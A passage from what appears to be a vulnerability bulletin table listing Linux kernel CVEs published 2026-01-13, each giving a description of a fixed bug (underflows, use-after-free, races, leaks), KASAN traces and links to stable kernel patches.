| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: caif: fix integer underflow in cffrml_receive() The cffrml_receive() function extracts a length field from the packet header and, when FCS is disabled, subtracts 2 from this length without validating that len >= 2. If an attacker sends a malicious packet with a length field of 0 or 1 to an interface with FCS disabled, the subtraction causes an integer underflow. This can lead to memory exhaustion and kernel instability, potential information disclosure if padding contains uninitialized kernel memory. Fix this by validating that len >= 2 before performing the subtraction. | 2026-01-13 | not yet calculated | CVE-2025-68799 | https://git.kernel.org/stable/c/f407f1c9f45bbf5c99fd80b3f3f4a94fdbe35691 https://git.kernel.org/stable/c/c54091eec6fed19e94182aa05dd6846600a642f7 https://git.kernel.org/stable/c/785c7be6361630070790f6235b696da156ac71b3 https://git.kernel.org/stable/c/f818cd472565f8b0c2c409b040e0121c5cf8592c https://git.kernel.org/stable/c/4ec29714aa4e0601ea29d2f02b461fc0ac92c2c3 https://git.kernel.org/stable/c/21fdcc00656a60af3c7aae2dea8dd96abd35519c https://git.kernel.org/stable/c/8a11ff0948b5ad09b71896b7ccc850625f9878d1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats Cited commit added a dedicated mutex (instead of RTNL) to protect the multicast route list, so that it will not change while the driver periodically traverses it in order to update the kernel about multicast route stats that were queried from the device. One instance of list entry deletion (during route replace) was missed and it can result in a use-after-free [1]. Fix by acquiring the mutex before deleting the entry from the list and releasing it afterwards. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum] Read of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043 CPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full) Hardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017 Workqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum] Call Trace: <TASK> dump_stack_lvl+0xba/0x110 print_report+0x174/0x4f5 kasan_report+0xdf/0x110 mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 29933: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x8f/0xa0 mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum] mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30 Freed by task 29933: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_save_free_info+0x3b/0x70 __kasan_slab_free+0x43/0x70 kfree+0x14e/0x700 mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum] mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum] process_one_work+0x9cc/0x18e0 worker_thread+0x5df/0xe40 kthread+0x3b8/0x730 ret_from_fork+0x3e9/0x560 ret_from_fork_asm+0x1a/0x30 | 2026-01-13 | not yet calculated | CVE-2025-68800 | https://git.kernel.org/stable/c/b957366f5611bbaba03dd10ef861283347ddcc88 https://git.kernel.org/stable/c/6e367c361a523a4b54fe618215c64a0ee189caf0 https://git.kernel.org/stable/c/37ca08b35a27ce8fd8e74dd3fd2ae21c23b63b73 https://git.kernel.org/stable/c/5f2831fc593c2b2efbff7dd0dd7441cec76adcd5 https://git.kernel.org/stable/c/216afc198484fde110ebeafc017992266f4596ce https://git.kernel.org/stable/c/4049a6ace209f4ed150429f86ae796d7d6a4c22b https://git.kernel.org/stable/c/8ac1dacec458f55f871f7153242ed6ab60373b90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_router: Fix neighbour use-after-free We sometimes observe use-after-free when dereferencing a neighbour [1]. The problem seems to be that the driver stores a pointer to the neighbour, but without holding a reference on it. A reference is only taken when the neighbour is used by a nexthop. Fix by simplifying the reference counting scheme. Always take a reference when storing a neighbour pointer in a neighbour entry. Avoid taking a referencing when the neighbour is used by a nexthop as the neighbour entry associated with the nexthop already holds a reference. Tested by running the test that uncovered the problem over 300 times. Without this patch the problem was reproduced after a handful of iterations. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310 Read of size 8 at addr ffff88817f8e3420 by task ip/3929 CPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full) Hardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023 Call Trace: <TASK> dump_stack_lvl+0x6f/0xa0 print_address_description.constprop.0+0x6e/0x300 print_report+0xfc/0x1fb kasan_report+0xe4/0x110 mlxsw_sp_neigh_entry_update+0x2d4/0x310 mlxsw_sp_router_rif_gone_sync+0x35f/0x510 mlxsw_sp_rif_destroy+0x1ea/0x730 mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0 __mlxsw_sp_inetaddr_lag_event+0xcc/0x130 __mlxsw_sp_inetaddr_event+0xf5/0x3c0 mlxsw_sp_router_netdevice_event+0x1015/0x1580 notifier_call_chain+0xcc/0x150 call_netdevice_notifiers_info+0x7e/0x100 __netdev_upper_dev_unlink+0x10b/0x210 netdev_upper_dev_unlink+0x79/0xa0 vrf_del_slave+0x18/0x50 do_set_master+0x146/0x7d0 do_setlink.isra.0+0x9a0/0x2880 rtnl_newlink+0x637/0xb20 rtnetlink_rcv_msg+0x6fe/0xb90 netlink_rcv_skb+0x123/0x380 netlink_unicast+0x4a3/0x770 netlink_sendmsg+0x75b/0xc90 __sock_sendmsg+0xbe/0x160 ____sys_sendmsg+0x5b2/0x7d0 ___sys_sendmsg+0xfd/0x180 __sys_sendmsg+0x124/0x1c0 do_syscall_64+0xbb/0xfd0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 [...] Allocated by task 109: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x7b/0x90 __kmalloc_noprof+0x2c1/0x790 neigh_alloc+0x6af/0x8f0 ___neigh_create+0x63/0xe90 mlxsw_sp_nexthop_neigh_init+0x430/0x7e0 mlxsw_sp_nexthop_type_init+0x212/0x960 mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280 mlxsw_sp_nexthop6_group_get+0x392/0x6a0 mlxsw_sp_fib6_entry_create+0x46a/0xfd0 mlxsw_sp_router_fib6_replace+0x1ed/0x5f0 mlxsw_sp_router_fib6_event_work+0x10a/0x2a0 process_one_work+0xd57/0x1390 worker_thread+0x4d6/0xd40 kthread+0x355/0x5b0 ret_from_fork+0x1d4/0x270 ret_from_fork_asm+0x11/0x20 Freed by task 154: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x43/0x70 kmem_cache_free_bulk.part.0+0x1eb/0x5e0 kvfree_rcu_bulk+0x1f2/0x260 kfree_rcu_work+0x130/0x1b0 process_one_work+0xd57/0x1390 worker_thread+0x4d6/0xd40 kthread+0x355/0x5b0 ret_from_fork+0x1d4/0x270 ret_from_fork_asm+0x11/0x20 Last potentially related work creation: kasan_save_stack+0x30/0x50 kasan_record_aux_stack+0x8c/0xa0 kvfree_call_rcu+0x93/0x5b0 mlxsw_sp_router_neigh_event_work+0x67d/0x860 process_one_work+0xd57/0x1390 worker_thread+0x4d6/0xd40 kthread+0x355/0x5b0 ret_from_fork+0x1d4/0x270 ret_from_fork_asm+0x11/0x20 | 2026-01-13 | not yet calculated | CVE-2025-68801 | https://git.kernel.org/stable/c/a2dfe6758fc63e542105bee8b17a3a7485684db0 https://git.kernel.org/stable/c/9e0a0d9eeb0dbeba2c83fa837885b19b8b9230fc https://git.kernel.org/stable/c/c437fbfd4382412598cdda1f8e2881b523668cc2 https://git.kernel.org/stable/c/4a3c569005f42ab5e5b2ad637132a33bf102cc08 https://git.kernel.org/stable/c/ed8141b206bdcfd5d0b92c90832eeb77b7a60a0a https://git.kernel.org/stable/c/675c5aeadf6472672c472dc0f26401e4fcfbf254 https://git.kernel.org/stable/c/8b0e69763ef948fb872a7767df4be665d18f5fd4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Limit num_syncs to prevent oversized allocations The exec and vm_bind ioctl allow userspace to specify an arbitrary num_syncs value. Without bounds checking, a very large num_syncs can force an excessively large allocation, leading to kernel warnings from the page allocator as below. Introduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request exceeding this limit. " ------------[ cut here ]------------ WARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124 ... Call Trace: <TASK> alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416 ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317 __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348 __do_kmalloc_node mm/slub.c:4364 [inline] __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388 kmalloc_noprof include/linux/slab.h:909 [inline] kmalloc_array_noprof include/linux/slab.h:948 [inline] xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158 drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797 drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894 xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:598 [inline] __se_sys_ioctl fs/ioctl.c:584 [inline] __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f ... " v2: Add "Reported-by" and Cc stable kernels. v3: Change XE_MAX_SYNCS from 64 to 1024. (Matt & Ashutosh) v4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt) v5: Do the check at the top of the exec func. (Matt) (cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c) | 2026-01-13 | not yet calculated | CVE-2025-68802 | https://git.kernel.org/stable/c/e281d1fd6903a081ef023c341145ae92258e38d2 https://git.kernel.org/stable/c/1d200017f55f829b9e376093bd31dfbec92081de https://git.kernel.org/stable/c/8e461304009135270e9ccf2d7e2dfe29daec9b60 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: NFSv4 file creation neglects setting ACL An NFSv4 client that sets an ACL with a named principal during file creation retrieves the ACL afterwards, and finds that it is only a default ACL (based on the mode bits) and not the ACL that was requested during file creation. This violates RFC 8881 section 6.4.1.3: "the ACL attribute is set as given". The issue occurs in nfsd_create_setattr(), which calls nfsd_attrs_valid() to determine whether to call nfsd_setattr(). However, nfsd_attrs_valid() checks only for iattr changes and security labels, but not POSIX ACLs. When only an ACL is present, the function returns false, nfsd_setattr() is skipped, and the POSIX ACL is never applied to the inode. Subsequently, when the client retrieves the ACL, the server finds no POSIX ACL on the inode and returns one generated from the file's mode bits rather than returning the originally-specified ACL. | 2026-01-13 | not yet calculated | CVE-2025-68803 | https://git.kernel.org/stable/c/c182e1e0b7640f6bcc0c5ca8d473f7c57199ea3d https://git.kernel.org/stable/c/75f91534f9acdfef77f8fa094313b7806f801725 https://git.kernel.org/stable/c/60dbdef2ebc2317266a385e4debdb1bb0e57afe1 https://git.kernel.org/stable/c/381261f24f4e4b41521c0e5ef5cc0b9a786a9862 https://git.kernel.org/stable/c/bf4e671c651534a307ab2fabba4926116beef8c3 https://git.kernel.org/stable/c/214b396480061cbc8b16f2c518b2add7fbfa5192 https://git.kernel.org/stable/c/913f7cf77bf14c13cfea70e89bcb6d0b22239562 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver After unbinding the driver, another kthread `cros_ec_console_log_work` is still accessing the device, resulting an UAF and crash. The driver doesn't unregister the EC device in .remove() which should shutdown sub-devices synchronously. Fix it. | 2026-01-13 | not yet calculated | CVE-2025-68804 | https://git.kernel.org/stable/c/27037916db38e6b78a0242031d3b93d997b84020 https://git.kernel.org/stable/c/e1da6e399df976dd04c7c73ec008bc81da368a95 https://git.kernel.org/stable/c/8dc1f5a85286290dbf04dd5951d020570f49779b https://git.kernel.org/stable/c/393b8f9bedc7806acb9c47cefdbdb223b4b6164b https://git.kernel.org/stable/c/4701493ba37654b3c38b526f6591cf0b02aa172f https://git.kernel.org/stable/c/24a2062257bbdfc831de5ed21c27b04b5bdf2437 https://git.kernel.org/stable/c/944edca81e7aea15f83cf9a13a6ab67f711e8abd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fuse: fix io-uring list corruption for terminated non-committed requests When a request is terminated before it has been committed, the request is not removed from the queue's list. This leaves a dangling list entry that leads to list corruption and use-after-free issues. Remove the request from the queue's list for terminated non-committed requests. | 2026-01-13 | not yet calculated | CVE-2025-68805 | https://git.kernel.org/stable/c/a6d1f1ace16d0e777a85f84267160052d3499b6e https://git.kernel.org/stable/c/95c39eef7c2b666026c69ab5b30471da94ea2874 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix buffer validation by including null terminator size in EA length The smb2_set_ea function, which handles Extended Attributes (EA), was performing buffer validation checks that incorrectly omitted the size of the null terminating character (+1 byte) for EA Name. This patch fixes the issue by explicitly adding '+ 1' to EaNameLength where the null terminator is expected to be present in the buffer, ensuring the validation accurately reflects the total required buffer size. | 2026-01-13 | not yet calculated | CVE-2025-68806 | https://git.kernel.org/stable/c/cae52c592a07e1d3fa3338a5f064a374a5f26750 https://git.kernel.org/stable/c/a28a375a5439eb474e9f284509a407efb479c925 https://git.kernel.org/stable/c/d26af6d14da43ab92d07bc60437c62901dc522e6 https://git.kernel.org/stable/c/6dc8cf6e7998ef7aeb9383a4c2904ea5d22fa2e4 https://git.kernel.org/stable/c/95d7a890e4b03e198836d49d699408fd1867cb55 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: fix race between wbt_enable_default and IO submission When wbt_enable_default() is moved out of queue freezing in elevator_change(), it can cause the wbt inflight counter to become negative (-1), leading to hung tasks in the writeback path. Tasks get stuck in wbt_wait() because the counter is in an inconsistent state. The issue occurs because wbt_enable_default() could race with IO submission, allowing the counter to be decremented before proper initialization. This manifests as: rq_wait[0]: inflight: -1 has_waiters: True rwb_enabled() checks the state, which can be updated exactly between wbt_wait() (rq_qos_throttle()) and wbt_track()(rq_qos_track()), then the inflight counter will become negative. And results in hung task warnings like: task:kworker/u24:39 state:D stack:0 pid:14767 Call Trace: rq_qos_wait+0xb4/0x150 wbt_wait+0xa9/0x100 __rq_qos_throttle+0x24/0x40 blk_mq_submit_bio+0x672/0x7b0 ... Fix this by: 1. Splitting wbt_enable_default() into: - __wbt_enable_default(): Returns true if wbt_init() should be called - wbt_enable_default(): Wrapper for existing callers (no init) - wbt_init_enable_default(): New function that checks and inits WBT 2. Using wbt_init_enable_default() in blk_register_queue() to ensure proper initialization during queue registration 3. Move wbt_init() out of wbt_enable_default() which is only for enabling disabled wbt from bfq and iocost, and wbt_init() isn't needed. Then the original lock warning can be avoided. 4. Removing the ELEVATOR_FLAG_ENABLE_WBT_ON_EXIT flag and its handling code since it's no longer needed This ensures WBT is properly initialized before any IO can be submitted, preventing the counter from going negative. | 2026-01-13 | not yet calculated | CVE-2025-68807 | https://git.kernel.org/stable/c/f55201fb3becff6a903fd29f4d1147cc7e91eb0c https://git.kernel.org/stable/c/9869d3a6fed381f3b98404e26e1afc75d680cbf9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: vidtv: initialize local pointers upon transfer of memory ownership vidtv_channel_si_init() creates a temporary list (program, service, event) and ownership of the memory itself is transferred to the PAT/SDT/EIT tables through vidtv_psi_pat_program_assign(), vidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign(). The problem here is that the local pointer where the memory ownership transfer was completed is not initialized to NULL. This causes the vidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and in the flow that jumps to free_eit, the memory that was freed by vidtv_psi_*_table_destroy() can be accessed again by vidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it is freed once again. Therefore, to prevent use-after-free and double-free vulnerability, local pointers must be initialized to NULL when transferring memory ownership. | 2026-01-13 | not yet calculated | CVE-2025-68808 | https://git.kernel.org/stable/c/c342e294dac4988c8ada759b2f057246e48c5108 https://git.kernel.org/stable/c/12ab6ebb37789b84073e83e4d9b14a5e0d133323 https://git.kernel.org/stable/c/3caa18d35f1dabe85a3dd31bc387f391ac9f9b4e https://git.kernel.org/stable/c/fb9bd6d8d314b748e946ed6555eb4a956ee8c4d8 https://git.kernel.org/stable/c/a69c7fd603bf5ad93177394fbd9711922ee81032 https://git.kernel.org/stable/c/30f4d4e5224a9e44e9ceb3956489462319d804ce https://git.kernel.org/stable/c/98aabfe2d79f74613abc2b0b1cef08f97eaf5322 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: vfs: fix race on m_flags in vfs_cache ksmbd maintains delete-on-close and pending-delete state in ksmbd_inode->m_flags. In vfs_cache.c this field is accessed under inconsistent locking: some paths read and modify m_flags under ci->m_lock while others do so without taking the lock at all. Examples: - ksmbd_query_inode_status() and __ksmbd_inode_close() use ci->m_lock when checking or updating m_flags. - ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(), ksmbd_clear_inode_pending_delete() and ksmbd_fd_set_delete_on_close() used to read and modify m_flags without ci->m_lock. This creates a potential data race on m_flags when multiple threads open, close and delete the same file concurrently. In the worst case delete-on-close and pending-delete bits can be lost or observed in an inconsistent state, leading to confusing delete semantics (files that stay on disk after delete-on-close, or files that disappear while still in use). Fix it by: - Making ksmbd_query_inode_status() look at m_flags under ci->m_lock after dropping inode_hash_lock. - Adding ci->m_lock protection to all helpers that read or modify m_flags (ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(), ksmbd_clear_inode_pending_delete(), ksmbd_fd_set_delete_on_close()). - Keeping the existing ci->m_lock protection in __ksmbd_inode_close(), and moving the actual unlink/xattr removal outside the lock. This unifies the locking around m_flags and removes the data race while preserving the existing delete-on-close behaviour. | 2026-01-13 | not yet calculated | CVE-2025-68809 | https://git.kernel.org/stable/c/5adad9727a815c26013b0d41cfee92ffa7d4037c https://git.kernel.org/stable/c/ccc78781041589ea383e61d5d7a1e9a31b210b93 https://git.kernel.org/stable/c/ee63729760f5b61a66f345c54dc4c7514e62383d https://git.kernel.org/stable/c/991f8a79db99b14c48d20d2052c82d65b9186cad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot Reject attempts to disable KVM_MEM_GUEST_MEMFD on a memslot that was initially created with a guest_memfd binding, as KVM doesn't support toggling KVM_MEM_GUEST_MEMFD on existing memslots. KVM prevents enabling KVM_MEM_GUEST_MEMFD, but doesn't prevent clearing the flag. Failure to reject the new memslot results in a use-after-free due to KVM not unbinding from the guest_memfd instance. Unbinding on a FLAGS_ONLY change is easy enough, and can/will be done as a hardening measure (in anticipation of KVM supporting dirty logging on guest_memfd at some point), but fixing the use-after-free would only address the immediate symptom. ================================================================== BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x362/0x400 [kvm] Write of size 8 at addr ffff8881111ae908 by task repro/745 CPU: 7 UID: 1000 PID: 745 Comm: repro Not tainted 6.18.0-rc6-115d5de2eef3-next-kasan #3 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 Call Trace: <TASK> dump_stack_lvl+0x51/0x60 print_report+0xcb/0x5c0 kasan_report+0xb4/0xe0 kvm_gmem_release+0x362/0x400 [kvm] __fput+0x2fa/0x9d0 task_work_run+0x12c/0x200 do_exit+0x6ae/0x2100 do_group_exit+0xa8/0x230 __x64_sys_exit_group+0x3a/0x50 x64_sys_call+0x737/0x740 do_syscall_64+0x5b/0x900 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f581f2eac31 </TASK> Allocated by task 745 on cpu 6 at 9.746971s: kasan_save_stack+0x20/0x40 kasan_save_track+0x13/0x50 __kasan_kmalloc+0x77/0x90 kvm_set_memory_region.part.0+0x652/0x1110 [kvm] kvm_vm_ioctl+0x14b0/0x3290 [kvm] __x64_sys_ioctl+0x129/0x1a0 do_syscall_64+0x5b/0x900 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Freed by task 745 on cpu 6 at 9.747467s: kasan_save_stack+0x20/0x40 kasan_save_track+0x13/0x50 __kasan_save_free_info+0x37/0x50 __kasan_slab_free+0x3b/0x60 kfree+0xf5/0x440 kvm_set_memslot+0x3c2/0x1160 [kvm] kvm_set_memory_region.part.0+0x86a/0x1110 [kvm] kvm_vm_ioctl+0x14b0/0x3290 [kvm] __x64_sys_ioctl+0x129/0x1a0 do_syscall_64+0x5b/0x900 entry_SYSCALL_64_after_hwframe+0x4b/0x53 | 2026-01-13 | not yet calculated | CVE-2025-68810 | https://git.kernel.org/stable/c/89dbbe6ff323fc34659621a577fe0af913f47386 https://git.kernel.org/stable/c/cb51bef465d8ec60a968507330e01020e35dc127 https://git.kernel.org/stable/c/9935df5333aa503a18de5071f53762b65c783c4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: svcrdma: use rc_pageoff for memcpy byte offset svc_rdma_copy_inline_range added rc_curpage (page index) to the page base instead of the byte offset rc_pageoff. Use rc_pageoff so copies land within the current page. Found by ZeroPath (https://zeropath.com) | 2026-01-13 | not yet calculated | CVE-2025-68811 | https://git.kernel.org/stable/c/e8623e9c451e23d84b870811f42fd872b4089ef6 https://git.kernel.org/stable/c/2a77c8dd49bccf0ca232be7c836cec1209abb8da https://git.kernel.org/stable/c/a8ee9099f30654917aa68f55d707b5627e1dbf77 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: Add sanity check for stop streaming Add sanity check in iris_vb2_stop_streaming. If inst->state is already IRIS_INST_ERROR, we should skip the stream_off operation because it would still send packets to the firmware. In iris_kill_session, inst->state is set to IRIS_INST_ERROR and session_close is executed, which will kfree(inst_hfi_gen2->packet). If stop_streaming is called afterward, it will cause a crash. [bod: remove qcom from patch title] | 2026-01-13 | not yet calculated | CVE-2025-68812 | https://git.kernel.org/stable/c/f8b136296722e258ec43237a35f72c92a6d4501a https://git.kernel.org/stable/c/ad699fa78b59241c9d71a8cafb51525f3dab04d4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipvs: fix ipv4 null-ptr-deref in route error path The IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure() without ensuring skb->dev is set, leading to a NULL pointer dereference in fib_compute_spec_dst() when ipv4_link_failure() attempts to send ICMP destination unreachable messages. The issue emerged after commit ed0de45a1008 ("ipv4: recompile ip options in ipv4_link_failure") started calling __ip_options_compile() from ipv4_link_failure(). This code path eventually calls fib_compute_spec_dst() which dereferences skb->dev. An attempt was made to fix the NULL skb->dev dereference in commit 0113d9c9d1cc ("ipv4: fix null-deref in ipv4_link_failure"), but it only addressed the immediate dev_net(skb->dev) dereference by using a fallback device. The fix was incomplete because fib_compute_spec_dst() later in the call chain still accesses skb->dev directly, which remains NULL when IPVS calls dst_link_failure(). The crash occurs when: 1. IPVS processes a packet in NAT mode with a misconfigured destination 2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route 3. The error path calls dst_link_failure(skb) with skb->dev == NULL 4. ipv4_link_failure() → ipv4_send_dest_unreach() → __ip_options_compile() → fib_compute_spec_dst() 5. fib_compute_spec_dst() dereferences NULL skb->dev Apply the same fix used for IPv6 in commit 326bf17ea5d4 ("ipvs: fix ipv6 route unreach panic"): set skb->dev from skb_dst(skb)->dev before calling dst_link_failure(). KASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f] CPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2 RIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233 RIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285 Call Trace: <TASK> spec_dst_fill net/ipv4/ip_options.c:232 spec_dst_fill net/ipv4/ip_options.c:229 __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330 ipv4_send_dest_unreach net/ipv4/route.c:1252 ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265 dst_link_failure include/net/dst.h:437 __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412 ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764 | 2026-01-13 | not yet calculated | CVE-2025-68813 | https://git.kernel.org/stable/c/dd72a93c80408f06327dd2d956eb1a656d0b5903 https://git.kernel.org/stable/c/312d7cd88882fc6cadcc08b02287497aaaf94bcd https://git.kernel.org/stable/c/cdeff10851c37a002d87a035818ebd60fdb74447 https://git.kernel.org/stable/c/4729ff0581fbb7ad098b6153b76b6f5aac94618a https://git.kernel.org/stable/c/25ab24df31f7af843c96a38e0781b9165216e1a8 https://git.kernel.org/stable/c/689a627d14788ad772e0fa24c2e57a23dbc7ce90 https://git.kernel.org/stable/c/ad891bb3d079a46a821bf2b8867854645191bab0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring: fix filename leak in __io_openat_prep() __io_openat_prep() allocates a struct filename using getname(). However, for the condition of the file being installed in the fixed file table as well as having O_CLOEXEC flag set, the function returns early. At that point, the request doesn't have REQ_F_NEED_CLEANUP flag set. Due to this, the memory for the newly allocated struct filename is not cleaned up, causing a memory leak. Fix this by setting the REQ_F_NEED_CLEANUP for the request just after the successful getname() call, so that when the request is torn down, the filename will be cleaned up, along with other resources needing cleanup. | 2026-01-13 | not yet calculated | CVE-2025-68814 | https://git.kernel.org/stable/c/2420ef01b2e836fbc05a0a8c73a1016504eb0458 https://git.kernel.org/stable/c/8f44c4a550570cd5903625133f938c6b51310c9b https://git.kernel.org/stable/c/18b99fa603d0df5e1c898699c17d3b92ddc80746 https://git.kernel.org/stable/c/e232269d511566b1f80872256a48593acc1becf4 https://git.kernel.org/stable/c/7fbfb85b05bc960cc50e09d03e5e562131e48d45 https://git.kernel.org/stable/c/b14fad555302a2104948feaff70503b64c80ac01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: ets: Remove drr class from the active list if it changes to strict Whenever a user issues an ets qdisc change command, transforming a drr class into a strict one, the ets code isn't checking whether that class was in the active list and removing it. This means that, if a user changes a strict class (which was in the active list) back to a drr one, that class will be added twice to the active list [1]. Doing so with the following commands: tc qdisc add dev lo root handle 1: ets bands 2 strict 1 tc qdisc add dev lo parent 1:2 handle 20: \ tbf rate 8bit burst 100b latency 1s tc filter add dev lo parent 1: basic classid 1:2 ping -c1 -W0.01 -s 56 127.0.0.1 tc qdisc change dev lo root handle 1: ets bands 2 strict 2 tc qdisc change dev lo root handle 1: ets bands 2 strict 1 ping -c1 -W0.01 -s 56 127.0.0.1 Will trigger the following splat with list debug turned on: [ 59.279014][ T365] ------------[ cut here ]------------ [ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0. [ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220 [ 59.280860][ T365] Modules linked in: [ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary) [ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220 [ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 <0f> 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44 ... [ 59.288812][ T365] Call Trace: [ 59.289056][ T365] <TASK> [ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80 [ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0 [ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10 [ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240 [ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10 [ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.292313][ T365] ? trace_contention_end+0xc8/0x110 [ 59.292656][ T365] 